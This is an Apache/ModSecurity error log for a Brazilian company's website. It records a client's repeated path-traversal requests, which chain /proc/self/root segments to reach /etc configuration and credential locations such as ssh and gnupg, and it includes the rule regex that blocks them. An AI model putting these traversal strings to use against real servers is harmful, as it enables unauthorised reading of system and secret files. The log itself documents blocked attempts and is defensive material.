[Fri Mar 20 07:24:32.455017 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:55404] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/localtime"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0gYNa6ubjKNq_cu4bM6wAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:24:33.758468 2026] [:error] [pid 7893:tid 140411725141760] [client 74.7.243.128:55406] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libaudit.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0gYRCii7xarUs8iHZgOAAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:24:40.532025 2026] [:error] [pid 10189:tid 140411624429312] [client 74.7.243.128:55416] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudo-ldap.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0gaDJ3M9BSuKP7CAYTMQAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:24:41.253007 2026] [mime_magic:error] [pid 9818:tid 140411590858496] (70014)End of file found: [client 216.73.216.191:35190] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:24:49.227105 2026] [:error] [pid 7893:tid 140411708356352] [client 74.7.243.128:34100] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0gcRCii7xarUs8iHZgUgAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:24:56.515449 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:55790] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0geNa6ubjKNq_cu4bNBQAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:24:57.333165 2026] [:error] [pid 7235:tid 140411699963648] [client 74.7.241.31:34588] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0gefqxLDW4GITHUkTfOgAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:24:58.039418 2026] [:error] [pid 11167:tid 140411725141760] [client 74.7.243.128:55806] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0gevHIg5MgXLBnicPxIQAAAcI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:25:02.565334 2026] [mime_magic:error] [pid 11642:tid 140411674785536] (70014)End of file found: [client 57.141.18.85:36436] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:25:06.126847 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:55808] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0gguoXxyEfFpUF8f96cwAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:25:07.499226 2026] [:error] [pid 31215:tid 140411582465792] [client 74.7.243.128:33900] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ggwF0L0L-SsrnPo5g7QAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:25:08.812475 2026] [:error] [pid 9818:tid 140411582465792] [client 74.7.243.128:33910] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ghF1pVZ5mVmJwsFMo0wAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:25:11.158307 2026] [:error] [pid 10189:tid 140411649607424] [client 74.7.243.128:55214] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ghzJ3M9BSuKP7CAYTVwAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:25:13.556381 2026] [:error] [pid 10189:tid 140411548894976] [client 74.7.243.128:55222] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0giTJ3M9BSuKP7CAYTYAAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:25:14.841900 2026] [:error] [pid 21219:tid 140411649607424] [client 74.7.243.128:55238] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0givXLqtnMIWvjpaKS7AAAAos"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:25:16.147671 2026] [:error] [pid 7893:tid 140411582465792] [client 74.7.243.128:55248] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0gjBCii7xarUs8iHZgXQAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:25:19.136048 2026] [:error] [pid 7893:tid 140411708356352] [client 74.7.243.128:55248] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0gjxCii7xarUs8iHZgYgAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:25:23.850256 2026] [:error] [pid 10189:tid 140411548894976] [client 74.7.243.128:54336] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0gkjJ3M9BSuKP7CAYTcQAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:25:25.447494 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.243.128:54346] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0glda6ubjKNq_cu4bNEwAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:25:26.704814 2026] [:error] [pid 21219:tid 140411641214720] [client 74.7.243.128:54354] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0glvXLqtnMIWvjpaKTAwAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:25:29.515348 2026] [:error] [pid 11167:tid 140411574073088] [client 74.7.243.128:54364] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0gmfHIg5MgXLBnicPxRAAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:25:33.183338 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:53978] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0gnda6ubjKNq_cu4bNIAAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:25:34.115686 2026] [:error] [pid 9818:tid 140411699963648] [client 74.7.241.31:53684] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0gnl1pVZ5mVmJwsFMpAAAAAEU"], referer: 